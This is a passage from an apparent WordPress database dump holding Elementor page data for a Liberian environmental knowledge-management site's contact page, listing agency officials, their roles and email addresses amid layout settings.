yout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19810,2395,'_jetpack_related_posts_cache','a:1:{s:32:\"e57a391bd08aeb2bc55e8f58d83c1121\";a:2:{s:7:\"expires\";i:1628878852;s:7:\"payload\";a:0:{}}}'),(19811,2410,'_jetpack_related_posts_cache','a:1:{s:32:\"e57a391bd08aeb2bc55e8f58d83c1121\";a:2:{s:7:\"expires\";i:1628787673;s:7:\"payload\";a:0:{}}}'),(19812,2411,'_jetpack_related_posts_cache','a:1:{s:32:\"e57a391bd08aeb2bc55e8f58d83c1121\";a:2:{s:7:\"expires\";i:1626144918;s:7:\"payload\";a:2:{i:0;a:1:{s:2:\"id\";i:2419;}i:1;a:1:{s:2:\"id\";i:2395;}}}}'),(19813,2898,'_elementor_edit_mode','builder'),(19814,2898,'_elementor_template_type','wp-page'),(19815,2898,'_elementor_version','2.7.5'),(19816,2898,'_wp_page_template','default'),(19817,2898,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"slideshow\",\"background_color\":\"rgba(255,255,255,0.75)\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_slideshow_gallery\":[{\"id\":2315,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\"}],\"background_slideshow_loop\":\"\"},\"elements\":[],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":90,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Kawusu Toure\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\